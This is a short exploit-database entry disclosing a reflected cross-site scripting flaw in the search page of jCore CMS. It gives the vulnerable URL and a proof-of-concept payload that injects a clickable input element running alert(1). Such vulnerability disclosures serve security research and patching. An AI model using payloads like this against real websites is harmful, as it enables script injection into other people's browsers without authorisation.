id: 10302
date: 12/17/2009
title: jCore CMS Cross Site Scripting Vulnerability
author: loneferret
cves: 

============================================
jCore CMS Cross Site Scripting Vulnerability
============================================

Found: loneferret
Vendor: jCore
Site: http://www.jcore.net/home
Software link: http://www.jcore.net/downloads
 
Search page is vulnerable to cross-site scripting.
 
Exploit:
http://server/modules/search?search=[xss here]
http://server/modules/search?search=</a>[xss here]
 
Example:
The result page will screw up. Hit the back button and you newly created
submit input type will be there. Fully functional.
http://server/modules/search?search=</a><input value="xss" onclick="alert(1)" type="submit">



#  0day.today [2023-03-25]  #